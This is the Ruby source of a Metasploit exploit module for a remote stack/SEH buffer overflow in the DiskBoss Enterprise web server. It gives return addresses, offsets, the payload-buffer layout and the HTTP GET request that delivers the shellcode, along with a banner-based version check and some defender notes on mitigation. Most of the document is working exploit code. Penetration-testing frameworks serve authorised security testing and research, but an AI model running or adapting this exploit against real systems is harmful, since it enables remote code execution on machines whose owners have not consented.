GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
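# Metasploit module for the DiskBoss Enterprise HTTP GET request-path stack
# buffer overflow (EDB 40869 / EDB 42395).
#
# Notes for defenders reading this module:
# * Affected builds named by the module are v7.4.28, v7.5.12 and v8.2.14;
#   any of these exposing the built-in web server should be upgraded or have
#   the web interface disabled / firewalled.
# * The request built in #exploit carries a request path of roughly 5,000
#   bytes (see the padding arithmetic there). A URI-length limit on a reverse
#   proxy, or an IDS rule on request-line length for this service, covers
#   this class of request.
# * All three targets rely on fixed addresses inside libpal.dll, so the
#   module presumably depends on that DLL loading at a predictable base;
#   NOTE(review): confirm whether forced ASLR / SafeSEH on the host breaks
#   these addresses for the installed build.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata: affected versions, references, payload
  # constraints and the per-version target table used by #exploit.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
      'Description' => %q{
        This module exploits a stack-based buffer overflow vulnerability
        in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
        caused by improper bounds checking of the request path in HTTP GET
        requests sent to the built-in web server. This module has been
        tested successfully on Windows XP SP3 and Windows 7 SP1.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'vportal',       # Vulnerability discovery and PoC
          'Ahmad Mahfouz', # Vulnerability discovery and PoC
          'Gabor Seljan',  # Metasploit module
          'Jacob Robles'   # Metasploit module
        ],
      'References' =>
        [
          ['EDB', '40869'],
          ['EDB', '42395']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform' => 'win',
      'Payload' =>
        {
          # Bytes excluded from the encoded payload: NUL, TAB, LF, CR, space.
          # Presumably these would truncate or split the HTTP request line.
          'BadChars' => "\x00\x09\x0a\x0d\x20",
          'Space' => 2000
        },
      'Targets' =>
        [
          [
            # Index 0: fingerprint the banner at run time and pick one of
            # the concrete targets below.
            'Automatic Targeting',
            {
              'auto' => true
            }
          ],
          [
            'DiskBoss Enterprise v7.4.28',
            {
              'Offset' => 2471,
              'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v7.5.12',
            {
              'Offset' => 2471,
              'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v8.2.14',
            {
              'Offset' => 2496,
              'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
            }
          ]
        ],
      # Declares that a resulting session is expected to be privileged;
      # presumably the DiskBoss service runs with elevated rights - confirm
      # on the host when assessing impact.
      'Privileged' => true,
      'DisclosureDate' => '2016-12-05',
      'DefaultTarget' => 0))
  end

  # Non-intrusive version check based on the banner served at '/'.
  #
  # The result is derived from the banner text only; nothing is sent that
  # exercises the overflow. A banner match is therefore reported as
  # Appears rather than Vulnerable, which is reserved for checks that
  # obtain direct evidence of the flaw.
  #
  # @return [Exploit::CheckCode] Appears for a listed affected version,
  #   Detected for any other DiskBoss Enterprise banner, Unknown when no
  #   usable response was received, Safe otherwise.
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/'
    )

    unless res
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return Exploit::CheckCode::Unknown
    end

    # A non-200 answer is not a timeout; report it as what it is so the
    # operator does not chase a connectivity problem that does not exist.
    unless res.code == 200
      vprint_error("Unable to determine, unexpected HTTP response code: #{res.code}")
      return Exploit::CheckCode::Unknown
    end

    banner = res.body.to_s
    return Exploit::CheckCode::Appears if banner.match?(/DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/)
    return Exploit::CheckCode::Detected if banner.match?(/DiskBoss Enterprise/)

    Exploit::CheckCode::Safe
  end

  # Builds the over-long request path for the selected target and sends it
  # as a single HTTP GET.
  #
  # With the automatic target, the version is first read from the banner at
  # '/'; the module aborts with Failure::NoTarget when the banner does not
  # name one of the three supported builds.
  def exploit
    mytarget = target

    if target['auto']
      mytarget = nil

      print_status('Automatically detecting the target...')

      res = send_request_cgi(
        'method' => 'GET',
        'uri' => '/'
      )

      if res && res.code == 200
        if res.body =~ /DiskBoss Enterprise v7\.4\.28/
          mytarget = targets[1]
        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
          mytarget = targets[2]
        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
          mytarget = targets[3]
        end
      end

      unless mytarget
        fail_with(Failure::NoTarget, 'No matching target')
      end

      print_status("Selected Target: #{mytarget.name}")
    end

    case mytarget
    when targets[1], targets[2]
      # v7.x layout: payload padded out to 'Offset', then the 4-byte 'Ret'
      # value, then 2500 bytes of filler (about 5,000 bytes in total).
      sploit = make_nops(21)
      sploit << payload.encoded
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
      sploit << [mytarget.ret].pack('V')
      sploit << rand_text_alpha(2500)
    when targets[3]
      # v8.2.14 layout: payload padded out to 'Offset', an SEH record built
      # from 'Ret', then filler up to a total length of 5000 bytes.
      seh = generate_seh_record(mytarget.ret)
      sploit = payload.encoded
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
      sploit[sploit.length, seh.length] = seh
      sploit << make_nops(10)
      sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
      sploit << rand_text_alpha(5000 - sploit.length)
    else
      fail_with(Failure::NoTarget, 'No matching target')
    end

    # The whole buffer travels as the request path of one GET request.
    send_request_cgi(
      'method' => 'GET',
      'uri' => sploit
    )
  end
end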